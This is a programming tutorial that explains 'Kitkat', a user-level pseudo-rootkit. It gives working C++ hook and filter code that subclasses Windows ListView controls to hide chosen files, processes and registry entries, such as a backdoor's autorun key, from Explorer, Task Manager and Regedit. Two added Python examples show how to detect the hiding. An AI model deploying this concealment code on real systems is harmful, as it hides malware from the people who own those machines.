
Contents

  1. Introduction
  2. Background
  3. Disclaimer
  4. Using the code
  5. Theory
  6. DLL injection
  7. Working
  8. Hooking The ListView Procedure
  9. Filter Function
  10. Summary
  11. DrawBacks
  12. FAQ
  13. Authors Notes
  14. History
  15. License
  16. About the Author

Original post: http://www.codeproject.com/KB/threads/Kitkat.aspx

A Very Simple pseudo-RootKit
  • Download Kitkat - 3.89 KB
  • Download DllTester - 2.51 KB

Introduction

The following article is about using global hooks and window subclassing to create a pseudo-rootkit capable of hiding files from Explorer, Task Manager, Registry Editor, etc.

Background

You must know basic C++, Windows programming and global hooks (for DLL injection). You must, of course, know what a rootkit is.

Disclaimer

Though the program is well tested, I have to include this disclaimer. The following program attempts to modify your operating system, which may make your system unstable. By executing or compiling the program you agree that neither the author nor the site hosting this article shall be held responsible for any damages occurring due to this program. This program comes with NO WARRANTY. USE AT YOUR OWN RISK!! If this scares you, you probably shouldn't run this program. The author hereby disclaims himself. This article may not be re-published elsewhere without the permission of the author.

Using the code

Compile the VC++ project to obtain a DLL. You could write your own loader, but I have enclosed a small DLL tester written in VB just in case. Once loaded, the DLL will establish a CallWnd hook.

Theory

OK, before I start a flame war or get outed by the gurus out here, I'd like to state that Kitkat is not a "System RootKit". It's more of a "User Rootkit", not to be confused with "UserMode RootKits (Ring 3)"...

There are 2 kinds of rootkits:

  1. Kernel mode rootkits (run in Ring 0 and filter requests at the highest level)
  2. Usermode rootkits (run in user mode, use API redirection/IAT hooking to get the job done)

The most powerful rootkits are no doubt the kernel rootkits. Usermode rootkits are less desirable; it is well known that not all API calls can be hooked using IAT patching. (Link to Article)

So which one of these does KitKat belong to? Actually, it's none of them...

See, most rootkits follow this model:

        OS --->RootKit Filter --->User

Every file that is being stealthed is hidden from the system itself, which means that even if you programmatically try to locate the file you will not be able to, since the filter intercepts such a request. This effectively stealths the files/processes from BOTH the SYSTEM and THE USER. If an antivirus requested a file that was being stealthed, the AV would have got an "INVALID_FILE_HANDLE".
Kitkat, on the other hand, is based on the following model:

        Windows GUI ---->Kitkat RootKit Filter  ---->User

As you can see, the OS doesn't figure in the diagram, because Kitkat only modifies/affects the GUI of the system. KitKat does NOT stealth your files from the system itself. It only hides your files from the "user's sight"; the files can still be read/written programmatically by any program.

For example, say Kitkat is hiding a file (c:/test.txt). Though you won't be able to see the file using Explorer, if you tried to execute "notepad c:/test.txt" this would work fine, since the system can "SEE" the file.
The system remains unaffected; only the GUI is affected. So this method can be used to

  1. Hide process listings (from Task Manager, etc.)
  2. Hide files in Explorer (folders, files, common dialog boxes)
  3. Hide entries in Registry Editor (Regedit)

I hope you're getting this...

DLL injection

The DLL injection method is based on Ivo Ivanov's code. A million thanks to him. Search this site for it.

Working

Grab your trusty Spy++ and try to find out the class name of the main window (where folders and files are displayed) used by

  1. Explorer.exe
  2. Regedit.exe
  3. Taskmgr.exe
  4. Common dialogs (Open File, Save File)
  5. Etc. (pretty much everything on your PC)

You'll notice that all the main windows (where folders and files are displayed) have the class name "SysListView32", popularly called a "ListView". Note that almost every control in Windows is a window; they are all created using "CreateWindow". Windows differentiates between a button and a list by means of a class name, and every window has a window procedure.

For each class there are specific procedures. For a button, WM_COMMAND may simulate a depressed button; the same message for a list simply highlights the selection. So you see, every control has its own built-in default procedure, and we are going to redirect this default procedure to our filter.

Kitkat.dll is going to be injected into every process that has a message queue (using a CallWnd hook). Once injected, using global subclassing we are going to "redirect" the default window procedure of the ListView to our filter function.

To perform the redirection we only need one API: "SetClassLong".

Hooking The ListView Procedure

    // Create a temporary SysListView32 window, since you need an instance of that control for SetClassLong.
    // hInstance is the module handle obtained elsewhere in the DLL (not shown in the article);
    // OldWndProc and NewWndProc are declared with the filter function below.
    HWND hWnd = CreateWindow("SysListView32", "", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);
    OldWndProc = SetClassLong(hWnd, GCL_WNDPROC, (LONG)NewWndProc);   // get previous addr
    DestroyWindow(hWnd);                                              // destroy it, don't need it anymore

Once this is done, every ListView created AFTER the hook was established will be affected...

Note: ListViews created before are unaffected, just one of the many drawbacks of the Kitkat method. Although it could be implemented using SetWindowLong(), we'd have to remember the old procedure for each one of them. Hey, this is just a demo.

Notice that we got the OldWndProc. You need to store this; we'll be needing it to call the real procedure.
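The defensive counterpart of the class swap above is an integrity check: the class procedure of a freshly created SysListView32 should still live inside comctl32.dll, the module that registers that class. The following is an added example (not code from the article or its download) of that check in Python. All inputs are constructed: the module table and addresses are made up, "kitkat.dll" stands in for whatever injected module is present, and on a real system the procedure address would come from GetClassLongPtr(hwnd, GCLP_WNDPROC) on a throwaway SysListView32 window and the module ranges from EnumProcessModules / GetModuleInformation.

```python
"""Integrity check for a window class procedure (added example, not the article's code).

Constructed inputs only; see the lead-in for where the real values come from."""
from dataclasses import dataclass
from typing import Iterable, Optional, Tuple


@dataclass(frozen=True)
class Module:
    name: str
    base: int
    size: int

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


# Constructed module table with made-up addresses; kitkat.dll is the hypothetical injected DLL.
SAMPLE_MODULES = [
    Module("explorer.exe", 0x01000000, 0x000FF000),
    Module("ntdll.dll",    0x7C900000, 0x000B2000),
    Module("kernel32.dll", 0x7C800000, 0x000F6000),
    Module("user32.dll",   0x7E410000, 0x00091000),
    Module("comctl32.dll", 0x773D0000, 0x00103000),
    Module("kitkat.dll",   0x10000000, 0x00006000),
]


def owning_module(addr: int, modules: Iterable[Module]) -> Optional[Module]:
    """Module whose mapped range contains addr, or None for memory no module backs."""
    for m in modules:
        if m.contains(addr):
            return m
    return None


def check_class_wndproc(addr: int, modules: Iterable[Module],
                        expected: str = "comctl32.dll") -> Tuple[str, str]:
    """Classify a class procedure address.

    Returns (verdict, detail), where verdict is one of:
      "ok"         - procedure is inside the module that normally implements the class
      "subclassed" - procedure is inside some other loaded module (detail = its name)
      "unbacked"   - procedure is not inside any loaded module
    """
    m = owning_module(addr, modules)
    if m is None:
        return "unbacked", "address is not inside any loaded module"
    if m.name.lower() == expected.lower():
        return "ok", m.name
    return "subclassed", m.name


if __name__ == "__main__":
    for addr in (0x773D1234, 0x10001000, 0x00410000):
        print(hex(addr), check_class_wndproc(addr, SAMPLE_MODULES))
```

Two points for anyone turning this into a real check. First, class data is per process (each process gets its own copy of the comctl32 classes), so the check has to run inside the process being inspected; since the article's DLL injects into every process with a message queue, a small GUI checker will itself receive the hook and can observe the swap on a control it creates. Second, GetClassLongPtrA on a class registered as Unicode (or the W variant on an ANSI class) returns a WNDPROC handle rather than a code address, which would show up here as "unbacked"; pick the variant that matches IsWindowUnicode before trusting that verdict.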

Filter Function

    // MAX, procList and UBOUND_PROCLIST are not shown in the article; the declarations below are
    // assumed: MAX is the text buffer size, procList the hard-coded names to hide (placeholder
    // entry), UBOUND_PROCLIST its length.
    #include <windows.h>
    #include <commctrl.h>
    #include <string.h>

    #define MAX 260
    static const char *procList[] = { "backdoor.exe" };
    #define UBOUND_PROCLIST (sizeof(procList) / sizeof(procList[0]))

    char temp[MAX];
    LONG OldWndProc;

    LRESULT CALLBACK NewWndProc(HWND Hwnd, UINT Message, WPARAM wParam, LPARAM lParam)
    {
        switch (Message)
        {
        // Why hook WM_PAINT? Because it was the only common message I found that
        // was sent to all of "Explorer.exe", "Regedit.exe", "taskmgr.exe"
        case WM_PAINT:
        {
            // Find the number of columns...we'll search every column
            HWND hdr = (HWND)SendMessage(Hwnd, LVM_GETHEADER, 0, 0);
            int Col = (int)SendMessage(hdr, HDM_GETITEMCOUNT, 0, 0);
            Col++;
            int i, j, k, itemCount = ListView_GetItemCount(Hwnd);
            for (i = 0; i < Col; i++)
            {
                for (j = 0; j < itemCount; j++)
                {
                    ListView_GetItemText(Hwnd, j, i, temp, MAX);
                    _strlwr(temp);   // lower-case in place (the original strcpy'd the buffer onto itself)
                    for (k = 0; k < UBOUND_PROCLIST; k++)
                    {
                        // substring search
                        if (strstr(temp, procList[k]))
                        {
                            ListView_DeleteItem(Hwnd, j);
                            itemCount--;
                            j--;
                            break;   // this row is gone; a second match on the same text must not delete its neighbour
                        }
                    }
                }
            }
            break;
        }
        }
        return CallWindowProc((WNDPROC)OldWndProc, Hwnd, Message, wParam, lParam);
    }
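The Theory section's key point, that the files stay visible to the file API while only the ListView rows vanish, is exactly what a cross-view check exploits: enumerate through the API, compare with what the GUI shows, and anything present in the first list but missing from the second is being hidden from the user. The example below is added here and is not the article's code; it reproduces the filter function's predicate (case-insensitive substring match of a hard-coded name list against every column of every row) in apply_gui_filter() to simulate the GUI view, then diffs that against a real directory listing. HIDE_LIST, the file names and the directory contents are constructed placeholders.

```python
"""Cross-view check (added example, not the article's code).

The GUI side is simulated with the article's own predicate so the demo runs offline;
HIDE_LIST and the sample files are constructed."""
import os
import tempfile
from typing import Iterable, List, Sequence, Tuple

Row = Tuple[str, int]            # (file name, size), as a two-column ListView would show it
HIDE_LIST = ["backdoor.exe"]     # placeholder; mirrors the article's hard-coded procList


def row_matches(row: Sequence[object], hide_list: Iterable[str]) -> bool:
    """True if any cell of the row contains any hidden name as a case-insensitive substring."""
    cells = [str(cell).lower() for cell in row]
    return any(name.lower() in cell for name in hide_list for cell in cells)


def apply_gui_filter(rows: Iterable[Row], hide_list: Iterable[str] = HIDE_LIST) -> List[Row]:
    """Rows a subclassed ListView would still display after the WM_PAINT filter."""
    hide = list(hide_list)
    return [row for row in rows if not row_matches(row, hide)]


def api_listing(path: str) -> List[Row]:
    """Directory contents as the file API reports them; GUI-level hiding cannot touch this."""
    return sorted((name, os.path.getsize(os.path.join(path, name))) for name in os.listdir(path))


def cross_view_diff(api_rows: Iterable[Row], gui_rows: Iterable[Row]) -> List[Row]:
    """Entries the API returns but the GUI does not show, i.e. hidden from the user."""
    shown = {row[0] for row in gui_rows}
    return [row for row in api_rows if row[0] not in shown]


def demo() -> List[str]:
    """Create a scratch directory, compare both views and return the hidden names."""
    with tempfile.TemporaryDirectory() as tmp:
        # constructed sample files; the third is innocent but matches by substring
        for name, payload in [("notes.txt", b"hello"),
                              ("backdoor.exe", b"MZ"),
                              ("readme-backdoor.exe.txt", b"x")]:
            with open(os.path.join(tmp, name), "wb") as f:
                f.write(payload)
        api_rows = api_listing(tmp)
        gui_rows = apply_gui_filter(api_rows)
        return sorted(name for name, _ in cross_view_diff(api_rows, gui_rows))


if __name__ == "__main__":
    print("present via API but missing from the GUI view:", demo())
```

Note what the substring predicate does to the innocent "readme-backdoor.exe.txt": it disappears too, and that kind of collateral hiding of unrelated entries is itself a tell when the two views are compared. On a real system the API side is any non-GUI enumeration (FindFirstFile, dir from a console, which the Drawbacks section already notes is unaffected); the GUI side is whatever the ListView actually displays.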

Summary

Now, a ListView can have multiple columns... Let's say I'm this evil malicious hacker dude those guys at Microsoft always seem to be talking about; anyway, I have my "backdoor.exe" which has created an Autorun entry in the registry. Now I want my entry to be hidden...

  1. Inject Dll into Regedit.exe
  2. Subclass SysListView32
  3. Intercept WM_PAINT Message
  4. Search Through ALL Columns and ALL ROWS to find "backdoor.exe"
  5. If found delete that entire Row.
  6. Call Default Procedure.

Drawbacks

  1. Does not affect console programs (because they don't have message queues)
  2. Any program can "detect" the files if it is actively looking for them. Assuming the user doesn't know he's been compromised, he'll never look for them.
  3. Controls created prior to hooking are unaffected.

FAQ

Q : Why WM_PAINT?
A : I tried to monitor all messages that were sent to SysListView32; the only common message sent to Explorer.exe, Taskmgr.exe and Regedit.exe was WM_PAINT. There are others, but they are not consistent across all applications.

Q : In Explorer, there's an empty space where the icon (for the stealthed file) was supposed to be. What's with that?
A : I'm guessing the positions are assigned before WM_PAINT is sent, so when we filter the result the space is already allocated for the icon. I guess this could be fixed by intercepting some other message, but I haven't tried any.

Q : What is its purpose?
A : Unfortunately, the only purpose I can tell you about involves malicious applications. But I hope something good can come out of it.

Q : Hey, I can see the stealthed files using cmd. Can you implement a method that works for them?
A : It can be implemented: we'd have to redirect stdin, stdout and stderr using pipes, but that's a story for another time. Who knows, if I get the time I will...

Q : It doesn't work on my system?
A : As of now I have only tested it on my own system, which is Win2k SP4. If it doesn't work on your system please report it, so that the article can be corrected.

Q : It's a DLL, how do I execute it?
A : You could write your own loader, but I have enclosed a small DLL tester written in VB just in case. Once loaded, the DLL will establish a CallWnd hook. You can customize it yourself...

Author's Notes

The processes to hide are hardcoded. To make it flexible you can use "ini" files to read the filenames from.
You can prevent the DLL from injecting itself into certain processes by matching g_exePath with the filename (say "explorer.exe").
More notes in the source code.

History

17 Feb 08 : Original Draft

License

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)

About the Author

KitKat - The Lazy/Poor Man's Rootkit
